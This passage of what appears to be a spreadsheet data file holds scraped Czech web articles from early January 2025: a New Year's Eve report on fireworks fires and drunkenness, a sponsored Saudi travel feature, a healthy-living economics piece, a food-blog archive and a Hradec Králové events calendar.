    <t>20250101_408_3692596465_ccbbe1b3957f6d335432.html</t>
  </si>
  <si>
    <t>ccbbe1b3957f6d335432</t>
  </si>
  <si>
    <t>Silvestrovská noc 2024: Desítky požárů od petard a rachejtlí, plné záchytky opilých</t>
  </si>
  <si>
    <t>Silvestrovská noc 2024: Desítky požárů od petard a rachejtlí, plné záchytky opilých Napsal Marek Novotný / Zprávy &amp;amp; krimi, Top 2 / 01/01/2025 / Diskuze / 3 minut čtení Hasiči po celé zemi zasahovali o silvestrovské noci u desítek požárů od zábavní pyrotechniky. Například v Praze ve Spálené ulici rachejtle zapálily věci uložené na balkoně. Hasiči po celé České republice zažívají náročnou noc, hlavně po 22. hodině vyjížděli k desítkám požárů. Například ve 23.30 zasahovali u požáru předmětů na balkoně ve Spálené ulici v Praze , kde chytily uskladněné věci od zábavní pyrotechniky. Celkem zasahovali pražští hasiči u 33 požárů, které byly přímo způsobeny neodborným používáním pyrotechniky. Nejčastěji hořely odpadkové koše, porosty a zbytky po pyrotechnice Požár balkonu od pyrotechniky ve Spálené ulice v Praze . Foto: HZS Od pyrotechniky chytil v Praze keř. Foto: HZS U požárů během noci zasahovali také jihočeští hasiči, většinou šlo o hořící odpadkové koše. „Například v Suchdole nad Lužnicí po 21. hodině hořel plastový kontejner zapálený od zábavní pyrotechniky,“ informovali hasiči. Od 23 hodin v jižních Čechách přibylo 5 požárů popelnic, 3 požáry křoví a tújí. Ve Starých Hodějovicích na Budějovicku došlo po půlnoci k požáru asi 40 tújí u rodinného domu. Na videu je požár zachycen svědky události v době před příjezdem prvních jednotek. Ve Starých Hodějovicích na Budějovicku došlo po půlnoci k požáru asi 40 tújí. Jihomoravští hasiči do 23. hodiny řešili 16 událostí. Z toho bylo 10 požárů většinou malého rozsahu například požáry kontejnerů a porostů. “Od půlnoci do 1.30 hodin evidujeme už 21 událostí z toho 18 požárů. Většinou jde o kontejnery a odpad. Nejčastěji v Brně . V obci Studnice na Vyškovsku zasahují jednotky u požáru rodinného domu,“ dodali hasiči. Hasiči na Olomoucku ke 23. hodině zasahovali u osmi požárů, které souvisely se silvestrovskými oslavami. „Šlo převážně o zahoření kontejnerů na odpad a zbytkové požáry po odpálení pyrotechniky,“ uvedla mluvčí hasičů Lucie Balážová. K jedné hodině ráno už evidují hasiči na Olomoucku celkem 14 požárů. Opět šlo především o požáry popelnic a požáry odpadu od pyrotechniky. Požár kontejneru od rachejtlí na Olomoucku. Foto: HZS Na Liberecku hasiči během silvestrovské noci zasahovali celkem u 14 událostí, z nichž bylo 5 požárů. “Jednalo se ve dvou případech o požár kontejneru, tři požáry vznikly v souvislosti se zábavní pyrotechnikou a jednou hořel odpad u rodinného domu,” uvedli liberečtí hasiči. Silvestrovské požáry na Liberecku . 14letý mladík nadýchal 1,55 promile Problémy ale dělají také lidé, kteří nezvládli alkohol . Například v Pardubicích městská policie zasahovala u 14letého opilého mladíka, kterému kolemjdoucí zavolali záchranku. „Nadýchal 1,55 promile. Než si pro něj přijedou rodiče, zůstane v péči záchranky,“ informovala městská policie. Jiný opilý muž, který nadýchal přes dvě promile, pak strážníky zasypal nekonečným množstvím urážek. Řada lidí už odpoledne musela na záchytku. „Kdo si na dnešní večer nepojistil rezervaci místa na záchytce v Pardubicích , má smůlu. Už od 20 hodin je plno a v Hradci mají letos zavřeno,“ dodali pardubičtí strážníci. V Pardubicích zasahovali u opilého mladíka. Foto: MP Záchytka v Pardubicích byla už ve 20 hodin plná. Foto: MP Záchranáři: Nebyla to hezká noc Telefony vyzváněly téměř nepřetržitě také na liberecké záchrance. “Naše posádky měly plné ruce práce. Nad rámec té běžné si oslavy přelomu roku naši pomoc vyžádaly sedmkrát u úrazu pyrotechnikou, u mnoha úrazů pod vlivem alkoholu i fyzických napadení,” uvedl mluvčí liberecké záchranky Michael Georgiev. “A několikrát jsme vyjížděli i k nezletilým s intoxikací alkoholem ,” dodal mluvčí. Záchranáři se během noci nezastavili. 3250 případů za noc Celkově Policie ČR na silvestra řešila mnohem více konfliktních případů než v běžný den. “Především se jednalo o rušení nočního klidu, různé formy napadání a bohužel i domácí násilí,” sdělil policejní mluvčí s tím, že řešeno bylo celkem 3250 případů. Nejčtenější článek týdne Autor: Marek Novotný Autor person Marek Novotný Rubrika transition_slide Zprávy &amp;amp; krimi</t>
  </si>
  <si>
    <t>3550</t>
  </si>
  <si>
    <t>4070.0000000000005</t>
  </si>
  <si>
    <t>20250101_409_4261828151_01d758a13da1738623ab.html</t>
  </si>
  <si>
    <t>01d758a13da1738623ab</t>
  </si>
  <si>
    <t>Objevování tajemství Blízkého východu: dovolená v Saúdské Arábii</t>
  </si>
  <si>
    <t>Objevování tajemství Blízkého východu : dovolená v Saúdské Arábii Newsroom TTG 1. 1. 2025 Přečteno za 4 min. Říká se, že historie píše nejlepší bestsellery a v případě Saúdské Arábie najdete záhady, záhadné petroglyfy a starověké zdi, které čekají na objevení. Tato tajemství, záhadné petroglyfy a starobylé zdi byly svědky staletí historie a nyní jsou svědky rozvíjejícího se cestovního ruchu v zemi. Foto: (c) Saúdský úřad pro cestovní ruch Před zavedením elektronických víz a liberalizací vstupních předpisů byla Saúdská Arábie přístupná pouze pro obchodní, náboženské účely nebo organizované zájezdy. Od září 2019 země otevřela své brány individuálním turistům, takže není divu – každý chce odhalit tajemství, která Saúdská Arábie skrývá. Poušť, moře a hory Saúdská Arábie překvapuje bohatstvím krajiny, která připomíná neuvěřitelný přírodní kaleidoskop. Od moří hemžících se exotickými rybami, vzácnými mořskými živočichy a kvetoucími korálovými útesy až po bujné oázy, zelená pole a horské svahy – Saúdská Arábie má vše. Součástí krajiny jsou i syrové, ale překvapivě bohaté červené pouště zářící v západu slunce. Mezi pozoruhodné destinace patří poušť Ar-Rub‘ al Khali, známá jako Prázdná čtvrť, se slavnou datlovou oázou Al-Ahsa, oblast Hail se skalním uměním a oblast Al-Jawf s četnými starověkými archeologickými nalezišti, jako je studna Sisira, čtvrť Al Dar’i a hrad Marid. V Al-Ula najdete fascinující skalní hrobky v Hegře a starobylé hlavní město Dadan se lvími hrobkami. Pro dechberoucí výhledy prozkoumejte hornatou oblast Asir, která je známá svými historickými památkami a úžasnou krajinou v okolí města Tabuk . Navštivte Jebel Thera, Zelenou horu na jihu Abha, a objevte nedaleké vesnice, jako je Al-Muftaha, známé svou uměleckou atmosférou. Vydejte se malebnou cestou do Taif , města růží, projeďte horami, údolími, ovocnými sady a růžovými plantážemi. Saúdská Arábie s pobřežím rozkládajícím se na dva tisíce kilometrů nabízí úžasné pláže, často nedotčené lidskou rukou. Obzvláště oblíbené je pobřeží Rudého moře s přístavním městem Džidda a tyrkysovými vodami kolem Yanbu. Foto: (c) Saúdský úřad pro cestovní ruch Za horami, za dunami Vaše srdce se rozbuší, tváře zrudlé vzrušením, když se připravujete na dobytí pouštních dun. Ať už na lyžích nebo snowboardu na sandboarding, kde zlatočervený písek nahrazuje sníh, nebo zažít duny – jízdu v terénu na neustále se posunujících, větrem navátých dunách – vzrušení je nezapomenutelné. Mezi klidnější pouštní atrakce patří projížďky na velbloudech nebo kempování mezi zlatým pískem, když teploty v noci klesají. Pro ty, kteří hledají vzrušení při pěší turistice, nabízejí vyhlídky, jako je úchvatný útes asi 100 kilometrů od Rijádu známý jako „Okraj světa“, velkolepá panoramata. Mezi další nezapomenutelné zážitky patří trekking do slavné oázy Al-Ahsa, pěší túry k sopce Jabal Abyad nebo prozkoumání oblasti Hail, kde uvidíte starověké skalní umění staré 10 000 let, včetně Jabal Umm Sinman v Jubbah, Jabal Al Manjor a Jabal Raat v Shuwaymis. V Saúdské Arábii se budou milovníci vodních sportů cítit jako v ráji. Kromě potápění a šnorchlování v Rudém moři je vzrušující také koupání v pouštních jezerech vzniklých po zimních deštích. Kharrarah, jezero tekutého světla, a Al-Asfar, žluté jezero, jsou obzvláště působivé. Foto: (c) Saúdský úřad pro cestovní ruch Stezky dědictví UNESCO S více než 11 000 archeologickými nalezišti, z nichž některá jsou zapsána na seznamu světového dědictví UNESCO, nabízí Saúdská Arábie cestu starověkými městy, složitými skalními rytinami raných civilizací a hrobkami vytesanými ve skále. Začněte svůj průzkum v Hegře, lokalitě Al-Hijr v regionu Al-Ula, kde můžete obdivovat nabatejské nápisy, skalní rytiny a hrobky staré více než 200 000 let. V nepřátelských píscích Prázdné čtvrti se tyčí oáza Al-Ahsa, známá svými palmovými háji a křišťálově čistými prameny, kdysi místem setkávání obchodníků. Čtvrť Al-Turaif v Ad-Diriyah, bývalém hlavním městě Saúdské Arábie , nabízí jednu z největších staveb z nepálených cihel na světě, včetně paláce Salwa o rozloze 10 000 metrů čtverečních. Prozkoumejte historickou čtvrť Džiddy , Al-Balad, procházejte se úzkými uličkami se starověkými kupeckými obchody a tržnicemi provoněnými kořením. V poušti Al-Nafud (Velký Nefud) najdete starověké skalní umění v oblasti Hail z doby před 10 000 lety – Jabal Umm Sinman v Jubbah, Jabal Al Manjor a Jabal Raat v Shuwaymis. Patří mezi nejvýraznější neolitická skalní umělecká díla na Středním východě. Foto: (c) Saúdský úřad pro cestovní ruch Bohatost chutí Objevte kulinářské tradice hlavně na místních trzích, jako je Souq Al Qaisariya ve čtvrti Al-Rafaa v Al-Hofuf. Barvy, vůně a chutě ovoce, zeleniny a koření, rušné vyjednávání a úzké uličky vytvářejí dokonalé prostředí pro poznávání místních zvyků a chutí. Zde se doporučuje najmout si místního průvodce, který do vaší prohlídky přidá živé příběhy a ukáže vám, jak efektivně smlouvat při nakupování. Poukáže také na místa, kde se místní stravují, přičemž si zachovají svůj původní ráz. Kardamom, považovaný za nejstarší koření na světě, sušené černé limetky, hřebíček a kmín jsou v saúdské kuchyni běžné. Mezi tradiční lahůdky patří datle, které se konzumují jako džem k snídani s chlebem a sýrem. Ráno můžete vyzkoušet i pikantní shakshuku nebo sladký banánový chléb masoub. Na oběd si dejte teplé jídlo, jako je národní kabsa, ochucená rýže s masem nebo rybou, podávaná se studeným pitným jogurtem, laban. Večer se nabízí jareesh, pšeničná kaše s jehněčím masem a kořením a thareed, pikantní chlebový nákyp přidávaný do dušeného masa. Jako dezert vyzkoušejte datlové sušenky, kleicha nebo máslové sušenky podávané s arabskou kávou připravenou ze zrn kávy Arabica a kardamomu. Otevřenost světu Saúdští Arabové jsou pohostinní a stále chápavější, ale je naší povinností jako hostů se chovat vhodně a respektovat místní hodnoty. Oblékejte se střídmě do volného střihu, a přestože ženy již nemusejí nosit abáju a hidžáb, měly by se vyvarovat odhalování ramen a kolen. Ženy nyní mohou řídit, což byla ještě nedávno výsada vyhrazená pouze mužům. Turisté cestující jako páry nemusejí při odbavení v hotelu prokazovat, že jsou manželé. Během ramadánu je zdvořilé vyhýbat se jídlu, pití nebo kouření na veřejných místech. Před příjezdem nezapomeňte, že prodej, nákup a konzumace alkoholu v Saúdské Arábii jsou nezákonné. Foto: (c) Saúdský úřad pro cestovní ruch V rytmu saúdské zábavy Nejlepší způsob, jak poznat saúdskou kulturu a její obyvatele, je zúčastnit se některého z mnoha festivalů. Informace o nich lze nalézt v materiálech Saudi Seasons, iniciativy Saúdské komise pro cestovní ruch a národní dědictví. Každý rok se v různých regionech země konají desítky festivalů. Jednou z nejznámějších je Rijádská sezona, která nabízí koncerty a ochutnávky v pětihvězdičkových restauracích ve dvanácti různých zónách. Region Al-Ula je také bohatý na četné festivaly, mezinárodní akce a hostí start Rallye Dakar , koncerty, horkovzdušné balony a umělecké festivaly. Značnou pozornost přitahuje hudební a umělecký festival Winter at Tantora, jehož součástí jsou intimní koncerty světově uznávaných hudebníků a akce související se saúdským kulturním dědictvím. Přestože je Saúdská Arábie největší zemí na Blízkém východě , zůstává pro mnohé záhadou. Turisté se do Saúdského království hrnou stále více a v roce 2024 se stala jednou z nejoblíbenějších dovolenkových destinací! Text vznikl ve spolupráci se Saúdským úřadem pro cestovní ruch. www.visitsaudi.com Autor: Newsroom TTG Rubrika transition_slide Destinace měsíce</t>
  </si>
  <si>
    <t>20250101_41_4150887662_0efccb78478444f1e34c.html</t>
  </si>
  <si>
    <t>0efccb78478444f1e34c</t>
  </si>
  <si>
    <t>Jíst zdravě a hýbat se? Investice, která se vyplácí!</t>
  </si>
  <si>
    <t>Jíst zdravě a hýbat se? Investice, která se vyplácí! Zajímavosti 11. 2. 2025 Tým investorů v čele s Elonem Muskem překvapilo návrhem na odkoupení OpenAI za 97,37 miliardy dolarů. Tento krok připomíná otázky ohledně zachování neziskového charakteru společnosti a dlouhodobé napětí mezi Muskem a současným ředitelem společnosti Samem Altmanem. Zajímavosti 24. 1. 2025 Skupina UnitedHealth Group jmenovala Tima Noela novým generálním ředitelem společnosti UnitedHealthcare po tragickém úmrtí Briana Thompsona . Povýšení Noela, který má ve společnosti bohaté zkušenosti, přichází v klíčové době pro giganta zdravotního pojištění, jehož úlohou je poskytovat základní služby milionům Američanů. Jíst zdravě a hýbat se? Investice, která se vyplácí! Zdravý životní styl je dnes sice už vnímán jako něco, co je „prospěšné“, ale některými také jako záležitost drahá a časově náročná. Co když se na to ale podíváme z ekonomického hlediska? Reklama Investice do zdravého stravování a aktivního životního stylu se totiž může v dlouhodobém horizontu skutečně vyplatit. Pojďme si to trochu rozebrat. Menší náklady na zdravotní péči Prevence je levnější než léčba. Pravidelný pohyb a vyvážená strava snižují riziko vzniku chronických onemocnění, jako jsou obezita, cukrovka, kardiovaskulární choroby, některé typy rakoviny a potíže s pohybovým aparátem. Léčba těchto onemocnění je nejen finančně náročná, ale také snižuje kvalitu života. Pojišťovna vám nezaplatí vše, a tudíž vám může nutnost úprav životní rutiny kvůli zdravotním potížím citelně sáhnout do úspor. Méně nemocenských, více zisku. Lidé, kteří pečují o své zdraví, jsou logicky méně náchylní k nemocem, a tudíž tráví méně času na nemocenské. To znamená méně ztrát pro zaměstnavatele i pro samotné zaměstnance. Vyšší produktivita a efektivita Energie a koncentrace pro vyšší výkonnost. Zdravé stravování a dostatek pohybu dodávají energii, zlepšují koncentraci a paměť. To vede k vyšší produktivitě a efektivitě v práci. Lepší psychická odolnost za to stojí, ne? Pravidelný pohyb a vyvážená strava pomáhají snižovat stres a zlepšují psychickou odolnost. To se projeví v lepším zvládání náročných situací a v menší náchylnosti k syndromu vyhoření. Dlouhodobá investice do lidského kapitálu Zdravý životní styl zkrátka vede k delšímu a kvalitnějšímu životu. To znamená více času a energie na práci, rodinu a koníčky. Zdravější populace znamená menší zátěž pro sociální systém a nižší náklady na zdravotní péči a sociální dávky, z čehož nakonec profitujeme všichni. Jak na to? Plánujte si jídelníček dopředu a nakupujte potraviny s rozmyslem. Dbejte na to, abyste jedli stravu bohatou na minerály, vitamíny i další živiny. Vaření doma je levnější a mnohdy zdravější než stravování v restauracích. Nikdo neříká, že si nemůžete zajít s rodinou na oběd do pěkné restaurace, nicméně faktem zůstáva, že budete-li si jídlo připravovat sami, ušetříte. Hledejte způsoby, jak zařadit pohyb do svého každodenního života. Dlouhé procházky, jízda na kole, cvičení doma ( posilovací lavice a činky vás nevyjdou tak draho, a přesto získáte možnost účinně procvičit celé tělo) – možností je mnoho. Pro více inspirace můžete navštívit třeba některou z prodejen Decathlon nebo jiného oblíbeného prodejce sportovního vybavení. Investice do zdravého stravování a aktivního životního stylu se nemusí nutně projevit hned, ale v dlouhodobém horizontu přináší značné ekonomické výhody. Nejde jen o úsporu peněz, ale také o zvýšení produktivity a celkové zlepšení kvality života. Reklama Ekonomika 18. 3. 2025 Hospodářské prognózy OECD ukazují, že Trumpova protekcionistická politika zbrzdí globální růst a prohlubuje obavy z inflace. Organizace předpokládá nejtvrdší dopady na Kanadu a Mexiko , snížila odhady růstu pro několik států. Předpovídá náročné období, které může vést až k recesi. Ekonomika 17. 3. 2025 V nedávném rozhovoru se ministr financí Scott Bessent podrobně vyjádřil k problémům, které v současné době tíží americkou ekonomiku – zejména k pokračujícím vládním výdajům a rostoucí volatilitě trhů. Ujistil, že vláda usiluje o předcházení finanční krizi a zhodnotil, jaký vliv může mít stávající hospodářská politika na dlouhodobý růst. Průmysl 14. 3. 2025 Tesla pod vedením Elona Muska se ocitla v nezáviděníhodné situaci. Společnost se sídlem v Texasu , která je prostřednictvím svého ředitele spjata s administrativou amerického prezidenta Donalda Trumpa , vyslala varovný signál ohledně dopadů celní politiky Spojených států . V dopise americkému obchodnímu zmocněnci Tesla vyzývá k opatrnosti a upozorňuje, že odvetná cla mohou vážně poškodit její exportní aktivity. Ekonomika 13. 3. 2025 Obchodní napětí mezi Spojenými státy a Evropskou unií se dramaticky vyostřuje. Americký prezident Donald Trump ve čtvrtek pohrozil zavedením 200procentního cla na alkohol dovážený z Evropské unie . Reagoval tak na odvetná opatření EU, která byla reakcí na dříve ohlášená cla na ocel a hliník ze strany USA . Ekonomika 12. 3. 2025 Eskalace obchodního napětí mezi Spojenými státy a Evropskou unií pokračuje. 25procentní cla prezidenta Donalda Trumpa na veškerý dovoz oceli a hliníku do USA ve středu vstoupila v platnost. To vyvolalo okamžitou reakci EU, která oznámila, že od příštího měsíce zavede protiopatření zaměřené na americké zboží v hodnotě až 26 miliard eur (zhruba 650 miliard korun). Burzy a trhy 11. 3. 2025 Akcie hlavních amerických leteckých společností v úterý zaznamenaly prudký pokles. Důvodem je snížení prognózy zisku společnosti Delta Air Lines , které vyvolalo obavy z dopadu ekonomické nejistoty na sektor cestovního ruchu. Burzy a trhy 10. 3. 2025 Americké akciové trhy v pondělí zaznamenaly další propad. Ten byl vyvolán obavami z dopadu celní politiky prezidenta Donalda Trumpa na hospodářský růst. Šéf Bílého domu v nedělním rozhovoru pro Fox News navíc nevyloučil možnost recese a naznačil, že cla se mohou ještě zvýšit. Kryptoměny 7. 3. 2025 Americký prezident Donald Trump ve čtvrtek podepsal exekutivní příkaz ke zřízení strategické bitcoinové rezervy. Ta bude uchovávat bitcoiny zabavené federální vládou v rámci trestních a občanskoprávních řízení. Cílem je dlouhodobé zhodnocení těchto aktiv v „digitálním Fort Knoxu“, uvedl Trumpův kryptocar David Sacks na sociální síti X. Nejpopulárnější kryptoměna světa na zprávy reagovala propadem. Ekonomika 6. 3. 2025 Evropská centrální banka ve čtvrtek snížila úrokové sazby, čímž reagovala na zpomalující inflaci a slabý hospodářský růst. ECB ve čtvrtek přistoupila k šestému snížení sazeb od června a ponechává si otevřené dveře pro další případné kroky. Evropa momentálně čelí nejistotě spojené s hrozící obchodní válkou s USA a rostoucími výdaji na obranu. Ekonomika 5. 3. 2025 Americké spotřebitele a podniky čeká zdražení široké škály produktů. Důvodem jsou cla, která zavedla administrativa prezidenta Donalda Trumpa na dovoz z Mexika , Kanady a Číny . Růst cen se přitom bude týkat prakticky veškerého zboží dováženého z těchto zemí. NEJNOVĚJŠÍ Ekonomika 18. 3. 2025 Hospodářské prognózy OECD ukazují, že Trumpova protekcionistická politika zbrzdí globální růst a prohlubuje obavy z inflace. Organizace předpokládá nejtvrdší dopady na Kanadu a Mexiko , snížila odhady růstu pro několik států. Předpovídá náročné období, které může vést až k recesi. Ekonomika 17. 3. 2025 V nedávném rozhovoru se ministr financí Scott Bessent podrobně vyjádřil k problémům, které v současné době tíží americkou ekonomiku – zejména k pokračujícím vládním výdajům a rostoucí volatilitě trhů. Ujistil, že vláda usiluje o předcházení finanční krizi a zhodnotil, jaký vliv může mít stávající hospodářská politika na dlouhodobý růst. Průmysl 14. 3. 2025 Tesla pod vedením Elona Muska se ocitla v nezáviděníhodné situaci. Společnost se sídlem v Texasu , která je prostřednictvím svého ředitele spjata s administrativou amerického prezidenta Donalda Trumpa , vyslala varovný signál ohledně dopadů celní politiky Spojených států . V dopise americkému obchodnímu zmocněnci Tesla vyzývá k opatrnosti a upozorňuje, že odvetná cla mohou vážně poškodit její exportní aktivity. Ekonomika 13. 3. 2025 Obchodní napětí mezi Spojenými státy a Evropskou unií se dramaticky vyostřuje. Americký prezident Donald Trump ve čtvrtek pohrozil zavedením 200procentního cla na alkohol dovážený z Evropské unie . Reagoval tak na odvetná opatření EU, která byla reakcí na dříve ohlášená cla na ocel a hliník ze strany USA . Ekonomika 12. 3. 2025 Eskalace obchodního napětí mezi Spojenými státy a Evropskou unií pokračuje. 25procentní cla prezidenta Donalda Trumpa na veškerý dovoz oceli a hliníku do USA ve středu vstoupila v platnost. To vyvolalo okamžitou reakci EU, která oznámila, že od příštího měsíce zavede protiopatření zaměřené na americké zboží v hodnotě až 26 miliard eur (zhruba 650 miliard korun). Reklama Autor: businessnews24 Rubrika transition_slide Zajímavosti</t>
  </si>
  <si>
    <t>20250101_410_3692536659_8bab76f3524000f24e67.html</t>
  </si>
  <si>
    <t>8bab76f3524000f24e67</t>
  </si>
  <si>
    <t>Leden 2025</t>
  </si>
  <si>
    <t>Leden 2025 7. 1. 2025 1 min. čtení Teploty jsou dole, takže přijde vhod nějaké teplé pití na zahřátí. A pokud je navíc plné vitamínů, tím lépe. Ovocňák si pro tuhle příležitost připravil […] 7. 1. 2025 1 min. čtení Leden bude v síti francouzských pekařství PAUL ve znamení pravé francouzské tradice, reprezentované ikonickými croissanty. Oblíbenou klasiku obohatí neodolatelné novinky. 6. 1. 2025 1 min. čtení Doubleshot , česká pražírna výběrové kávy, představuje novinku na trhu – sáčkovou kávu! Jde o jedinečnou kombinaci výběrové kávy a jednoduché přípravy, kterou zvládne úplně každý. […] 6. 1. 2025 1 min. čtení Vývar, to není jen obyčejná polévka, ale základ mnoha dalších pokrmů. Jeho intenzivní chuť a léčivé účinky ho předurčují k tomu, aby se stal stálicí vašeho […] 5. 1. 2025 1 min. čtení Gulášová polévka je nedílnou součástí středoevropské kuchyně a její popularita přesahuje hranice kontinentu. Ale odkud tento oblíbený pokrm pochází a jaká je jeho historie? 5. 1. 2025 1 min. čtení Kdo by neměl rád, když se v chladných dnech zahřeje šálkem voňavé kávy? Nejenže povzbudí naše smysly, ale také nás příjemně zahřeje od hlavy až k patě. […] 1. 1. 2025 1 min. čtení Nový rok je nejen časem oslav a přání do budoucna, ale také příležitostí k pořádné hostině. Co se však tradičně vaří k obědu na Silvestra a proč […] Chcete mít zde svoji reklamu? Více informací zde Soutěže zde se brzy objeví nějaká soutěž 🙂 Nedávné příspěvky Recenze: RECEPTY – spaghetti carbonara Spaghetti carbonara podle originálního receptu s originálními italskými ingrediencemi jsou naprosto famózní. Jak jsou jednoduché a rychlé na přípravu tak jsou skvělé chuťově. Žádný „český hybrid“ se smetanou nebo česnekem, to není prostě ono … Vytvořte si doma dokonalý originál. Když si je dáte kdekoli v Itálii například v Římě , v Bologni nebo v Janově , budou dle našeho originálního receptu chutnat vždy stejně dobře 🙂 Petr Pavelka - Krizovatkachuti.cz Recenze: pivo PROOVAN, recenze no:1 Chuť je výraznější chmelová než mají jiná nealka, na první dobrou se tedy chuťově více vymyká průměru. Jsou ale cítit i mírně kyselejší tóny citrusů nebo limetky v kombinaci s vyšší hořkostí to vůbec není nepříjemné. Mírná sladová chuť se dostaví až v závěru jako mírný ocásek chuti. Říz je příjemně vysoký, pitelnost přijatelná. Jedno z mála piv u kterého si po obědě lze dát ještě jedno. Petr Pavelka - Krizovatkachuti.cz hodnocení od Krizovatkachuti.cz 24. 5. 2024 The Glenlivet 12 single malt whisky nám na první ochutnání přišla bez výrazné vůně a se silnou alkoholovou chutí. Byla hodně „ostrá“ avšak po chvilce již se sametovějším ocáskem. Nicméně ochutnávka druhý den již byla příjemnější, avizované vanilkové tóny, oříšky či stopy čokoládovějších tónů se daly již zaznamenat stejně tak vůně byla již standardně příjemná s lehkými variacemi na vanilku. Za nás tedy 80% Petr Pavelka Archív článků Teploty jsou dole, takže přijde vhod nějaké teplé pití na zahřátí. A pokud je navíc plné vitamínů, tím lépe. Ovocňák si pro tuhle příležitost připravil […] zveřejněno: Leden bude v síti francouzských pekařství PAUL ve znamení pravé francouzské tradice, reprezentované ikonickými croissanty. Oblíbenou klasiku obohatí neodolatelné novinky. zveřejněno: Doubleshot , česká pražírna výběrové kávy, představuje novinku na trhu – sáčkovou kávu! Jde o jedinečnou kombinaci výběrové kávy a jednoduché přípravy, kterou zvládne úplně každý. […] zveřejněno: Vývar, to není jen obyčejná polévka, ale základ mnoha dalších pokrmů. Jeho intenzivní chuť a léčivé účinky ho předurčují k tomu, aby se stal stálicí vašeho […] zveřejněno: Gulášová polévka je nedílnou součástí středoevropské kuchyně a její popularita přesahuje hranice kontinentu. Ale odkud tento oblíbený pokrm pochází a jaká je jeho historie? zveřejněno: Kdo by neměl rád, když se v chladných dnech zahřeje šálkem voňavé kávy? Nejenže povzbudí naše smysly, ale také nás příjemně zahřeje od hlavy až k patě. […] zveřejněno: Scroll do vrcholu Používáme cookies, abychom vám poskytli nejlepší online zážitek. Více informací o tom, které soubory cookies používáme, nebo jejich vypnutí najdete v. Vytvořeno pomocí GDPR Cookie Compliance Přehled ochrany osobních údajů Tyto webové stránky používají soubory cookies, abychom vám mohli poskytnout co nejlepší uživatelský zážitek. Informace o souborech cookie se ukládají ve vašem prohlížeči a plní funkce, jako je rozpoznání, když se na naše webové stránky vrátíte, a pomáhají našemu týmu pochopit, které části webových stránek považujete za nejzajímavější a nejužitečnější. Nezbytně nutné soubory cookies Nezbytně nutný soubor cookie by měl být vždy povolen, abychom mohli uložit vaše preference nastavení souborů cookie. Povolit nebo zakázat cookies Pokud tento soubor cookie zakážete, nebudeme moci uložit vaše preference. To znamená, že při každé návštěvě těchto webových stránek budete muset soubory cookies znovu povolit nebo zakázat. Soubory cookies třetích stran Tyto webové stránky používají službu Google Analytics ke shromažďování anonymních informací, jako je počet návštěvníků webu a nejoblíbenější stránky. Povolení tohoto souboru cookie nám pomáhá zlepšovat naše webové stránky. Povolit nebo zakázat cookies Povolte prosím nejprve nezbytně nutné soubory cookies, abychom mohli uložit vaše preference! Zásady používání souborů cookie Autor: Markéta Pavelková Autor person Markéta Pavelková</t>
  </si>
  <si>
    <t>20250101_411_3692535738_97ad407456099fe72c5a.html</t>
  </si>
  <si>
    <t>97ad407456099fe72c5a</t>
  </si>
  <si>
    <t>Kalendarium 29.ledna - středa od 18:30 hodin · hvězdná obloha, virtuální vesmír a celooblohová filmová projekce Jiné světy · digitální planetárium · 90 minut · pořad vhodný pro dospělé a mládež od staršího školního věku V digitálním planetáriu se nejprve podíváme na aktuální noční oblohu bez světelného znečištění. Následně podnikneme virtuální cestu do vesmíru. V poslední části programu zhlédneme celooblohovou filmovou projekci Jiné světy. Všechny návštěvníky žádáme, aby naše zařízení nenavštěvovali s příznaky jakéhokoliv infekčního onemocnění či zvýšenou teplotou. Dodržujte pokyny pracovníků zajišťujících program, ustanovení Návštěvního řádu a aktuálně obecně platná opatření či doporučení. Změna programu vyhrazena. Upozorňujeme, že z bezpečnostních důvodů není možné vstupovat do sálu digitálního planetária po zahájení programu. Snížené vstupné na programy Hvězdárny a planetária v Hradci Králové je určeno pro děti do 10 let, žáky a studenty od 10 do 26 let, držitele průkazek ZTP/P a seniory od 65 let. REINER(KACE) 29.ledna - středa od 18:30 hodin Program Reiner(kace) v autorském aranžmá Aidy Mujačič a dramaturgické spolupráci Pavla Straky, přetavuje melodie Karla Reinera (1910 - 1979), který byl v době 2. světové války postižen holokaustem a prošel vězněním v Terezíně , Osvětimi a Kauferingu. Základní inspirací se stalo to, že jeho melodie z terezínského představení Esther se nedochovaly v notové podobě a byly s dlouholetým časovým zpožděním rekonstruovány podle paměti v něm vystupujících herců, Další linii představuje to, že v Terezíně nemohly hudebníci využívat perfektně naladěné nástroje, ale ty se i tak stávaly vyjádřením životního smyslu, zvláště směrem k dětem. Pro ně napsal Reiner ve spolupráci s režisérem Esther a spisovatelem Norbertem Frýdem cyklus Květovaný kůň jako způsob, jak vyučovat poezii a hudbu v podmínkách, kdy židovské děti nesměly do veřejných škol. V neposlední řadě celá koncepce nezapomíná na to, že Reiner coby příslušník umělecké avantgardy 30. let pracoval s dobovou populární kulturou, byl žákem a spolupracovníkem Aloise Háby a E. F. Buriana a uvědomoval si, že hudba je součástí veřejného a politického prostředí, které hovoří jasným jazykem proti člověka svazujícímu nacionalistickému autoritářství. Spojení s hudebním světem Balkánu vychází z toho, že interpretka prožila podobný osud jako Karel Reiner v 90. letech 20. století, kdy v Bosně probíhala válka a hudba i pro ni byla nadějí a světlem. Akce se koná u příležitosti Dne holocaustu. Vstup volný. Akce proběhne od 18.30 hodin v konferenčním sále v 5. NP knihovny. One woman show Lenky Loubalové 29.ledna - středa od 19:00 hodin One woman show Lenky Loubalové Historky ze života přední herečky Klicperova divadla, které napsal sám život. Mnohdy neuvěřitelné, ale přesto zcela pravdivé a autentické, a také velmi osobní. Zn: Humor, víno a zpěv. Přijďte prožít jedinečný večer do Podkroví, kde vás svou neutuchající energií bude bavit naše Loubalka. 200 vstupné 200 Kč | V podkroví - nečísl. | KLICPEROVO DIVADLO o.p.s. V podkroví - nečísl. 2025-01-18 20:00:00 2025-11-18 23:00:00 KRÁLOVSKÝ PLES 800 29.ledna - středa od 20:00 hodin Je snad lepší příležitost, jak společně a s grácií zahájit celoroční oslavy, než městský ples? V jednu chvíli se jeho jako kouzlem stáváte součástí historických momentů Hradce Králové a zatančíte si na skladby v podání Salonního orchestru Filharmonie Hradec Králové, v dalším okamžiku vás jazzové tóny Moondance Orchestra Martina Kumžáka a energická show skupiny No Name přenese zpět do současnosti. Přijďte se ponořit do působivé plesové atmosféry, protančit celou noc a oslavit významné výročí města. Autor: OMEGA Czech - info@omegaczech.cz</t>
  </si>
  <si>
    <t>181</t>
  </si>
  <si>
    <t>20250101_412_3692521060_5716f97dc6309570dcbc.html</t>
  </si>
  <si>
    <t>5716f97dc6309570dcbc</t>
  </si>
  <si>
    <t>Prosinec</t>
  </si>
  <si>
